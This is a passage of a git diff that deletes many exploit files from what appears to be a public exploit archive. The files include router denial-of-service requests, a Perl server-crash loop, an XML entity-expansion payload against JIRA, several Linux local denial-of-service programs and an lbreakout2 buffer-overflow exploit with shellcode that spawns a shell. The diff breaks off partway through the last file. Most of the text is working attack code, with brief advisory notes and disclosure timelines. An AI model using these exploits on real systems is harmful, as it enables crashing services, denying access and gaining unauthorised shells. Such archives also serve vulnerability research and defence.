DENIAL OF SERVICE - -
- -
-
- -
- - -Reset to factory configuration : ---- Using Google Chrome browser : -to reset the router without any authentication just execute the following url http://ROUTER-ipaddress/SubmitMaintCONFIG?ACTION=R%E9tablir+la+configuration+initiale in the url bar - - - diff --git a/platforms/hardware/webapps/34203.txt b/platforms/hardware/webapps/34203.txt deleted file mode 100755 index d623bdf62..000000000 --- a/platforms/hardware/webapps/34203.txt +++ /dev/null @@ -1,112 +0,0 @@ -Exploit Title: Dlink DWR-113 Rev. Ax - CSRF causing Denial of Service -Google dork : N/A -Exploit Author: Blessen Thomas -Date : 29/07/14 -Vendor Homepage : http://www.dlink.com/ -Software Link : N/A -Firmware version: v2.02 2013-03-13 -Tested on : Windows 7 -CVE : CVE-2014-3136 -Type of Application : Web application -Release mode : Coordinated disclosure - - - -Vulnerability description: - - - -It was observed that the D-link DWR-113 wireless router is vulnerable to -denial of service attack via CSRF(Cross-Site Request Forgery) vulnerability. - - - -An attacker could craft a malicious CSRF exploit to change the password in -the password functionality when the user(admin) is logged in to the -application ,as the user interface (admin panel) lacks the csrf token or -nonce to prevent an attacker to change the password. - - - -As a result, as soon as the crafted malicious exploit is executed the -router is rebooted and the user could not login thus forcing to reset the -router’s device physically ,leading to a denial of service condition. - - - -POC code (exploit) : - - - -*Restart Router by CSRF* - - - - - - - - - -
- - - - - - - - - - - - - - - - - -
- - - - - - - - - -Tools used : - -Mozilla firefox browser v28.0 , Burp proxy free edition v1.5 - - - -Timeline : - - - -06-04-14 : Contacted Vendor with details of Vulnerability and Exploit. - - - -06-04-14 : Vendor D-Link forwards to R&D team for review - - - -29-04-14 : Vendor contacted to know the status. - - - -01-05-14 : Vendor acknowledged and released a patch - - - -01-05-14 : CVE ID provided by Mitre team. - - - -http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10034 - - - diff --git a/platforms/hardware/webapps/35345.txt b/platforms/hardware/webapps/35345.txt deleted file mode 100755 index b0176f931..000000000 --- a/platforms/hardware/webapps/35345.txt +++ /dev/null @@ -1,57 +0,0 @@ -TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service - - -Vendor: TP-LINK Technologies Co., Ltd. -Product web page: http://www.tp-link.us - -Affected version: - -- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014) -- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013) -- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013) -- Hardware version: WR740N v4 00000000 (v4.23) -- Model No. TL-WR740N / TL-WR740ND - -Summary: The TL-WR740N is a combined wired/wireless network connection -device integrated with internet-sharing router and 4-port switch. The -wireless N Router is 802.11b&g compatible based on 802.11n technology -and gives you 802.11n performance up to 150Mbps at an even more affordable -price. Bordering on 11n and surpassing 11g speed enables high bandwidth -consuming applications like video streaming to be more fluid. - -Desc: The TP-Link WR740N Wireless N Router network device is exposed to a -denial of service vulnerability when processing a HTTP GET request. This -issue occurs when the web server (httpd) fails to handle a HTTP GET request -over a given default TCP port 80. Resending the value 'new' to the 'isNew' -parameter in 'PingIframeRpm.htm' script to the router thru a proxy will -crash its httpd service denying the legitimate users access to the admin -control panel management interface. To bring back the http srv and the -admin UI, a user must physically reboot the router. - -Tested on: Router Webserver - - -Vulnerability discovered by Gjoko 'LiquidWorm' Krstic - @zeroscience - - -Advisory ID: ZSL-2014-5210 -Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php - - -13.11.2014 - ---- - - -Replay - -GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1 -Host: 192.168.0.1 -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20 -Authorization: Basic YWRtaW46YWRtaW4= -Connection: keep-alive diff --git a/platforms/hardware/webapps/9980.txt b/platforms/hardware/webapps/9980.txt deleted file mode 100755 index 593ae725a..000000000 --- a/platforms/hardware/webapps/9980.txt +++ /dev/null @@ -1,127 +0,0 @@ -_________________________________________ -Security Advisory NSOADV-2009-002 -_________________________________________ -_________________________________________ - - - Title: Websense Email Security Web Administrator DoS - Severity: Low - Advisory ID: NSOADV-2009-002 - Found Date: 28.09.2009 - Date Reported: 01.10.2009 - Release Date: 20.10.2009 - Author: Nikolas Sotiriu - Mail: nso-research (at) sotiriu.de - URL: http://sotiriu.de/adv/NSOADV-2009-002.txt - Vendor: Websense (http://www.websense.com/) - Affected Products: Websense Email Security v7.1 - Personal Email Manager v7.1 - Not Affected Products: Websense Email Security v7.1 Hotfix 4 - Personal Email Manager v7.1 Hotfix 4 - Remote Exploitable: Yes - Local Exploitable: Yes - Patch Status: Patched with Hotfix 4 - Disclosure Policy: http://sotiriu.de/policy.html - Thanks to: Thierry Zoller: for the permission to use his - Policy - - - -Background: -=========== - -Websense Email Security software incorporates multiple layers of -real-time Web security and data security intelligence to provide -leading email protection from converged email and Web 2.0 threats. -It helps to manage outbound data leaks and compliance risk, and enables -a consolidated security strategy with the trusted leader in Essential -Information Protection. - -(Product description from Websense Website) - -The Websense Email Security Web Administrator is a webfrontend, which -enables you to access the message administration, directory management -and to view the log. - - - -Description: -============ - -The Web Administrator frontend (STEMWADM.EXE) listens by default on port -TCP/8181. - -If an attacker sends a HTTP Request to port 8181 without waiting for a -response the webserver crashes. The proof of concept script just sends -a "GET /index.asp" and closes the socket. The server can not response -to the request anymore and dies. - -By default the service will always restart after a crash. So the poc -will send the request until it will be stopped. - - - -Proof of Concept : -================== - -#!/usr/bin/perl -use Socket; - -(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ", -" \n"; - -print "\nThe Webserver on http://$target:$port should be dead until", -"this script is running\n"; - -while (1) { -$ip = inet_aton($target) || die "host($target) not found.\n"; -$sockaddr = pack_sockaddr_in($port, $ip); -socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n"; - -connect(SOCKET, $sockaddr) || die "connect $target $port error.\n"; - -print SOCKET "GET /index.asp"; -print "Request sent ...\n"; - -close(SOCKET); - -sleep 1; - -}; - - - - - -Solution: -========= - -Vendor released a patch. - -http://tinyurl.com/yhe3hqa - - - -Disclosure Timeline (YYYY/MM/DD): -================================= - -2009.09.28: Vulnerability found -2009.10.01: Ask for a PGP Key -2009.10.01: Websense sent there PGP Key -2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure - date to Vendor -2009.10.08: Websense was not able to reproduce the DoS Problem -2009.10.08: Sent a mail with more explanation -2009.10.13: Websense verifies the finding and fixed it. The path will be - available in Version 7.2 which will be released in ~2 weeks -2009.10.13: Ask for a list of affected versions/products and changed the - release date to 2009.10.29. - (no response) -2009.10.20: Found the KB article and the Hotfix on Websense website -2009.10.20: Release of this advisory - - - - - - diff --git a/platforms/jsp/webapps/37218.txt b/platforms/jsp/webapps/37218.txt deleted file mode 100755 index 10b7331c7..000000000 --- a/platforms/jsp/webapps/37218.txt +++ /dev/null @@ -1,53 +0,0 @@ -source: http://www.securityfocus.com/bid/53595/info - -JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. - -Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application. - -The following versions are affected: - -Versions prior to JIRA 5.0.1 are vulnerable. -Versions prior to Gliffy 3.7.1 are vulnerable. -Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. - -POST somehost.com HTTP/1.1 -Accept-Encoding: gzip,deflate -Content-Type: text/xml;charset=UTF-8 -SOAPAction: "" -User-Agent: Jakarta Commons-HttpClient/3.1 -Host: somehost.com -Content-Length: 1577 - - - - - - - - - - - -]> - - - - - - - stuff1 - ?&lol9; - - stuff3 - - - stuff4 - stuff5 - - - - - - - diff --git a/platforms/linux/local/10022.c b/platforms/linux/local/10022.c deleted file mode 100755 index 7387a7a4e..000000000 --- a/platforms/linux/local/10022.c +++ /dev/null @@ -1,31 +0,0 @@ -int main(void) -{ - int ret; - int csd; - int lsd; - struct sockaddr_un sun; - - /* make an abstruct name address (*) */ - memset(&sun, 0, sizeof(sun)); - sun.sun_family = PF_UNIX; - sprintf(&sun.sun_path[1], "%d", getpid()); - - /* create the listening socket and shutdown */ - lsd = socket(AF_UNIX, SOCK_STREAM, 0); - bind(lsd, (struct sockaddr *)&sun, sizeof(sun)); - listen(lsd, 1); - shutdown(lsd, SHUT_RDWR); - - /* connect loop */ - alarm(15); /* forcely exit the loop after 15 sec */ - for (;;) { - csd = socket(AF_UNIX, SOCK_STREAM, 0); - ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun)); - if (-1 == ret) { - perror("connect()"); - break; - } - puts("Connection OK"); - } - return 0; -} \ No newline at end of file diff --git a/platforms/linux/local/19818.c b/platforms/linux/local/19818.c deleted file mode 100755 index 4e83e3105..000000000 --- a/platforms/linux/local/19818.c +++ /dev/null @@ -1,27 +0,0 @@ -source: http://www.securityfocus.com/bid/1072/info - -A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable. - -#include -#include -#include - -char buf[128 * 1024]; - -int main ( int argc, char **argv ) -{ -struct sockaddr SyslogAddr; -int LogFile; -int bufsize = sizeof(buf)-5; -int i; - -for ( i = 0; i < bufsize; i++ ) -buf[i] = ' '+(i%95); -buf[i] = '\0'; - -SyslogAddr.sa_family = AF_UNIX; -strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) ); -LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); -sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) ); -return 0; -} \ No newline at end of file diff --git a/platforms/linux/local/19850.c b/platforms/linux/local/19850.c deleted file mode 100755 index d40f2c87b..000000000 --- a/platforms/linux/local/19850.c +++ /dev/null @@ -1,31 +0,0 @@ -source: http://www.securityfocus.com/bid/1111/info - -A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly. - -Additional, similar problems exist in the stock xfs. Users can crash the font server remotely, and potential exists for buffer overruns. The crux of the problem stems from the font server being lax about verifying network input. While no exploits exist, it is likely they are available in private circles, and can result in remote root compromise. - -#include -#include - -#define CNT 50 -#define FS "/tmp/.font-unix/fs-1" - -int s,y; -struct sockaddr_un x; - -char buf[CNT]; - -main() { - for (y;y<2;y++) { - s=socket(PF_UNIX,SOCK_STREAM,0); - x.sun_family=AF_UNIX; - strcpy(x.sun_path,FS); - if (connect(s,&x,sizeof(x))) { perror(FS); exit(1); } - if (!y) write(s,"lK",2); - memset(buf,'A',CNT); - write(s,buf,CNT); - shutdown(s,2); - close(s); - } -} - diff --git a/platforms/linux/local/19870.pl b/platforms/linux/local/19870.pl deleted file mode 100755 index 942efbea9..000000000 --- a/platforms/linux/local/19870.pl +++ /dev/null @@ -1,16 +0,0 @@ -source: http://www.securityfocus.com/bid/1136/info - -CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken. - -The following perl script will create many directories in /tmp with incrementing pids: - -#!/usr/bin/perl - -$min=400; -$max=4000; - -for ($x=$min;$x<=$max;$x++) { -open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!"; -chmod 0600, "/tmp/cvs-serv$x"; -close CVSTMP; -} \ No newline at end of file diff --git a/platforms/linux/local/20217.c b/platforms/linux/local/20217.c deleted file mode 100755 index 85bd7abcf..000000000 --- a/platforms/linux/local/20217.c +++ /dev/null @@ -1,137 +0,0 @@ -source: http://www.securityfocus.com/bid/1664/info - -Any user with write access to /tmp or /var/tmp, can induce tmpwatch to cause Red Hat (and others runnng tmpwatch from cron) to stop responding, and possibly require a hard reboot. This is accomplished by creating a directory tree many (ie. ~6000) nodes deep in /tmp. For each level of the directory in /tmp, tmpwatch will fork() a new copy of itself. - -Red Hat affected versions: - -Red Hat Linux 7.0 (tmpwatch v.2.5.1) -Red Hat Linux 6.2 (tmpwatch v.2.2) - -Note: -(excerpted from Internet Security Systems Security Advisory) - -"Source code comparison between the Red Hat Linux 6.2 and 7.0 tmpwatch packages -suggests this vulnerability was recognized and a fix was attempted. However, -the fix is incorrect, and the vulnerability is still exploitable. - -Do not use the --fuser or -s options with tmpwatch." - ----START---cut---:a.c (mode 644) -// -// make lots of directories. -// ./a <#of-dirs> -// ./a with no arguments to delete dirs. -main(int argc,char *argv[]) -{ -int c=0,d=0; -if (argc!=2) -{ -while(!chdir("./A"))c++; -chdir(".."); -printf("c=%d removing\n",c); -while(!rmdir("./A")) {chdir("..");c--;} -if(c)printf("erm. bad thing.\n"); -} -else -{ -c=atoi(argv[1]); -printf("c=%d making.\n",c); -while(c--) -{ -mkdir("./A",0777); -chdir("./A"); -} -} -} ---END---cut-----:a.c - -# ./testscript - -(code follows) - ----START---cut---:testscript (mode 755) -#!/bin/sh -# clear the previous stuff. -./a -rm ./timer.results -touch timer.results -# create a 1 deep -./a 1 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 100 deep -./a 100 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 200 deep -./a 200 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 300 deep -./a 300 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 400 deep -./a 400 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 500 deep -./a 500 >>timer.results -time tmpwatch 240 . 2>>timer.results -# create a 600 deep -./a 600 >>timer.results -time tmpwatch 240 . 2>>timer.results -#tidy up. -./a >>timer.results - ---END---cut-----:testscript - -If you don't want to test it manually, here you will find the results on -the tests on my machine. Who says u need an Athlon with cable or DSL. I -say "Well, it would be nice. Real nice." I also think this program would -probably die faster and more spectacularly on a fast machine with a huge -amount of memory and swap space. Oh yeah. Save anything important. And you -have to run it as root. (I think. Should probably thought of that. I'll -remember it for next time.) The crontab is an effective way of getting it -run as root. Which it wants to do anyway. At about 4am everyday. - ---START---cut---:timer.results (mode 644) -c=1 making. -0.00user 0.01system 0:00.00elapsed 125%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+58minor)pagefaults 0swaps -c=100 making. -0.01user 0.19system 0:00.19elapsed 100%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+1797minor)pagefaults 0swaps -c=200 making. -0.07user 0.40system 0:00.49elapsed 94%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+3554minor)pagefaults 0swaps -c=300 making. -0.10user 0.66system 0:00.76elapsed 99%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (96major+5308minor)pagefaults 0swaps -c=400 making. -0.13user 1.33system 0:11.80elapsed 12%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (11766major+9445minor)pagefaults 1263swaps -c=500 making. -0.15user 2.11system 0:22.38elapsed 10%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (14104major+13238minor)pagefaults 2699swaps -c=600 making. -0.21user 2.81system 0:32.61elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (26066major+17781minor)pagefaults 4109swaps -c=600 removing -c=600 making. -0.11user 2.88system 0:36.14elapsed 8%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (25741major+17567minor)pagefaults 4009swaps -c=700 making. -0.20user 4.24system 0:45.95elapsed 9%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (35562major+22180minor)pagefaults 5542swaps -c=800 making. -Command terminated by signal 2 -0.00user 0.00system 6:01.87elapsed 0%CPU (0avgtext+0avgdata 0maxresident)k -0inputs+0outputs (102major+18minor)pagefaults 10swaps ---END---cut-----:timer.results - -(System is Cyrix-6x86 @ 187 MHz, 32M physical ram, 64M swap.) - -(^C was pressed after about a minute into the 800 deep one. Several system -programs died due to memory starvation. It took a quite a while afterwards -before the console regained any usabilty. When i tried to run startx, it -refused to start. xfs had died. everything looked odd. slow motion. i -think it was because of the loadavg) - -# uptime -9:00pm up 2:14, 2 users, load average: 202.28, 363.68, 186.46 \ No newline at end of file diff --git a/platforms/linux/local/20535.txt b/platforms/linux/local/20535.txt deleted file mode 100755 index 8fd428a18..000000000 --- a/platforms/linux/local/20535.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/2180/info - -ReiserFS is a file system alternative to the Linux ext2 file system. It was originally written by Hans Reiser, and is freely available and publicly maintained. - -A problem has been reported in the handling of long file names with ReiserFS version 3.5.28 on SuSE Linux distribution 7.0. It is possible to create a directory with a long file name (the initial example displayed a directory with 768 characters), then attempt to list the file system using system binary ls or with built in shell function echo and create a Denial of Service. Upon attempting to list or echo the contents of the filesystem, a kernel buffer overflow occurs, overwriting variables on the stack including possibly the return address, as well as crashing the system. It may be possible for a malicious user to execute arbitrary code, deny service to legitimate users, and potentially break out of a chroot environment. This vulnerability is yet unverified. - -mkdir "$(perl -e 'print "x" x 768')" \ No newline at end of file diff --git a/platforms/linux/local/22105.c b/platforms/linux/local/22105.c deleted file mode 100755 index 5c0de2c5a..000000000 --- a/platforms/linux/local/22105.c +++ /dev/null @@ -1,32 +0,0 @@ -source: http://www.securityfocus.com/bid/6420/info - -A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap(). - -It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped. - - #define PAGES 10 - - #include - #include - #include - #include - #include - #include - - int main() { - int ad1,ad2,zer,mem,pid,i; - zer=open("/dev/zero",O_RDONLY); - ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0); - pid=getpid(); - if (!fork()) { - char p[64]; - ptrace(PTRACE_ATTACH,pid,0,0); - sleep(1); - sprintf(p,"/proc/%d/mem",pid); - mem=open(p,O_RDONLY); - ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1); - write(1,(char*)ad2,PAGES*PAGE_SIZE); - } - sleep(100); - return 0; - } diff --git a/platforms/linux/local/23738.c b/platforms/linux/local/23738.c deleted file mode 100755 index 3efd37136..000000000 --- a/platforms/linux/local/23738.c +++ /dev/null @@ -1,186 +0,0 @@ -source: http://www.securityfocus.com/bid/9712/info - -Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application. - -A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process. - -/* - * lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr - * vulnerability reported by Ulf Harnhammar - * usage: ./lbreakout2-exp [-r ][-b [-s ]] - * - */ - -#include -#include -#include -#include -#include -#include - -#define BSIZE 200 -#define D_START 0xbfffffff -#define PATH "/usr/local/bin/lbreakout2" - -void exec_vuln(); -int tease(); -int make_string(long ret_addr); -int bruteforce(long start); -void banner(char *argv); - -char shellcode[]= - "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3" - "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - -char *buffer,*ptr; - -int -main(int argc,char *argv[]) -{ - char * option_list = "br:s:"; - int option,brute = 0,opterr = 0; - long ret,start = D_START; - - if (argc < 2) banner(argv[0]); - - while((option = getopt(argc,argv,option_list)) != -1) - switch(option) - { - case 'b': - brute = 1; - break; - case 'r': - ret = strtoul(optarg,NULL,0); - make_string(ret); - tease(); - exit(1); - break; - case 's': - start = strtoul(optarg,NULL,0); - break; - case '?': - fprintf(stderr,"[-] option \'%c\' invalid\n",optopt); - banner(argv[0]); - exit(1); - } - - if(brute) - bruteforce(start); - - return 0; -} - -void -exec_vuln() -{ - execl(PATH,PATH,NULL); -} - -int -tease() -{ - pid_t pid; - pid_t wpid; - int status; - - pid = fork(); - - if (pid == -1) - { - fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno)); - exit(13); - } - else if (pid == 0) - { - exec_vuln(); - } - else - { - wpid = wait(&status); - if (wpid == -1) - { - fprintf(stderr,"[-] %s: wait()\n",strerror(errno)); - return 1; - } - else if (wpid != pid) - abort(); - else - { - if (WIFEXITED(status)) - { - fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status)); - return WEXITSTATUS(status); - } - else if (WIFSIGNALED(status)) - return WTERMSIG(status); - else - fprintf(stderr,"[-] Stopped.\n"); - } - } - return 1; -} - -int -make_string(long ret_addr) -{ - int i; - long ret,addr,*addr_ptr; - - buffer = (char *)malloc(1024); - if(!buffer) - { - fprintf(stderr,"[-] Can't allocate memory\n"); - exit(-1); - } - - ret = ret_addr; - - ptr = buffer; - - memset(ptr,0x90,BSIZE-strlen(shellcode)); - ptr += BSIZE-strlen(shellcode); - - memcpy(ptr,shellcode,strlen(shellcode)); - ptr += strlen(shellcode); - - addr_ptr = (long *)ptr; - for(i=0;i<200;i++) - *(addr_ptr++) = ret; - ptr = (char *)addr_ptr; - *ptr = 0; - - setenv("HOME",buffer,1); - return 0; -} - -int -bruteforce(long start) -{ - int ret; - long i; - - fprintf(stdout,"[+] Starting bruteforcing...\n"); - - for(i=start;i<0;i=i-50) - { - fprintf(stdout,"[+] Testing 0x%x...\n",i); - make_string(i); - ret=tease(); - if(ret==0) - { - fprintf(stdout,"[+] Ret address found: 0x%x\n",i); - break; - } - } - - return 0; -} - -void -banner(char *argv) -{ - fprintf(stderr,"lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr\n"); - fprintf(stderr,"vulnerability reported by Ulf Harnhammar \n"); - fprintf(stderr,"usage: %s [-r ][-b [-s ]]\n",argv); - exit(1); -} diff --git a/platforms/linux/local/24078.c b/platforms/linux/local/24078.c deleted file mode 100755 index b42b49000..000000000 --- a/platforms/linux/local/24078.c +++ /dev/null @@ -1,108 +0,0 @@ -source: http://www.securityfocus.com/bid/10264/info - -PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. - -The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop. - -/* - PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept - by Shadowinteger - 2004-05-04 - - Written after reading the security advisory posted by borg (ChrisR-) on - Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net - - Acknowledgments: sabu (www.sabu.net) - - - Vulnerability: - PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area() - (function in mm/mmap.c) is vulnerable to a local Denial of Service attack - because of a bug that puts the kernel into an infinite loop. - - Read the security advisory for more info: - http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0 - - - Exploitation: - We need to get passed the following line of code in - arch_get_unmapped_area() to succeed with a DoS: - if (TASK_SIZE - len < addr) { ... - - We do it like this: - - TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL - - DOSVAL is the value we'll use. - - arch_get_unmapped_area() does the following: - - if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code. - (TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed. - - A DOSVAL of e.g. 0x80000000 or above will work most times, no real need - for the funky calculation above. - - There are quite a few functions available that are "front-ends" to - arch_get_unmapped_area(). This exploit uses good-old mmap(). - - - Tiny DoS PoC: - -#include -#include -#include -#include -#include -int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);} - -*/ - -#include -#include -#include -#include -#include -#include - -#define TASK_SIZE 0xc0000000 -#define TYPICAL_ADDR 0x43882000 -#define SINK 0x04000000 - -#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK) - -int main() { - int fd = open("/dev/zero", O_RDONLY); - - printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n" - "by Shadowinteger 20040504\n" - "created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n" - "ChrisR -> www.cr-secure.net\n" - "\n" - "the exploit binary must be marked PF_PAX_RANDMMAP to work!\n" - "\n" - "greetz goes to: sabu (www.sabu.net)\n" - "\n" - "------------------------------------------------------------------------------\n" - "will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n" - "\n" - "if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n" - "are you sure you want to continue? [type Y to continue] ", DOSVAL); - fflush(stdout); - - if (getchar() != 'Y') { - printf("aborted.\n"); - return 0; - } - - printf("\n" - "attempting to DoS...\n"); - - if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) { - perror("mmap"); - } - - printf("your kernel does not seem to be vulnerable! :)\n"); - - return 0; -} diff --git a/platforms/linux/local/26248.sh b/platforms/linux/local/26248.sh deleted file mode 100755 index 9ebe344cf..000000000 --- a/platforms/linux/local/26248.sh +++ /dev/null @@ -1,11 +0,0 @@ -source: http://www.securityfocus.com/bid/14790/info - -The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service. - -A local attacker can exploit this vulnerability by making repeated reads to the '/proc/scsi/sg/devices' file, which will exhaust kernel memory and lead to a denial of service. - -#!/bin/sh - -while true; do -cat /proc/scsi/sg/devices > /dev/null -done \ No newline at end of file diff --git a/platforms/linux/local/26382.c b/platforms/linux/local/26382.c deleted file mode 100755 index 6a2e8eca0..000000000 --- a/platforms/linux/local/26382.c +++ /dev/null @@ -1,243 +0,0 @@ -source: http://www.securityfocus.com/bid/15156/info - -Linux Kernel is reported prone to a local denial-of-service vulnerability. - -This issue arises from an infinite loop when binding IPv6 UDP ports. - -/* - * Linux kernel - * IPv6 UDP port selection infinite loop - * local denial of service vulnerability - * proof of concept code - * version 1.0 (Oct 29 2005) - * CVE ID: CAN-2005-2973 - * - * by Remi Denis-Courmont < exploit at simphalempin dot com > - * http://www.simphalempin.com/dev/ - * - * Vulnerable: - * - Linux < 2.6.14 with IPv6 - * - * Not vulnerable: - * - Linux >= 2.6.14 - * - Linux without IPv6 - * - * Fix: - * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git; - * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2 - */ - - -/***************************************************************************** - * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. * - * * - * Redistribution and use in source and binary forms, with or without * - * modification, are permitted provided that the following conditions * - * are met: * - * 1. Redistributions of source code must retain the above copyright notice, * - * this list of conditions and the following disclaimer. * - * 2. Redistribution in binary form must reproduce the above copyright * - * notice, this list of conditions and the following disclaimer in the * - * documentation and/or other materials provided with the distribution. * - * * - * The author's liability shall not be incurred as a result of loss of due * - * the total or partial failure to fulfill anyone's obligations and direct * - * or consequential loss due to the software's use or performance. * - * * - * The current situation as regards scientific and technical know-how at the * - * time when this software was distributed did not enable all possible uses * - * to be tested and verified, nor for the presence of any or all faults to * - * be detected. In this respect, people's attention is drawn to the risks * - * associated with loading, using, modifying and/or developing and * - * reproducing this software. * - * The user shall be responsible for verifying, by any or all means, the * - * software's suitability for its requirements, its due and proper * - * functioning, and for ensuring that it shall not cause damage to either * - * persons or property. * - * * - * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * - * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * - * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * - * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * - * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * - * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * - * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * - * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * - * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * - * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * - * * - * The author does not either expressly or tacitly warrant that this * - * software does not infringe any or all third party intellectual right * - * relating to a patent, software or to any or all other property right. * - * Moreover, the author shall not hold someone harmless against any or all * - * proceedings for infringement that may be instituted in respect of the * - * use, modification and redistrbution of this software. * - *****************************************************************************/ - - -#include -#include -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -static int -bind_udpv6_port (uint16_t port) -{ - int fd; - - fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP); - if (fd != -1) - { - 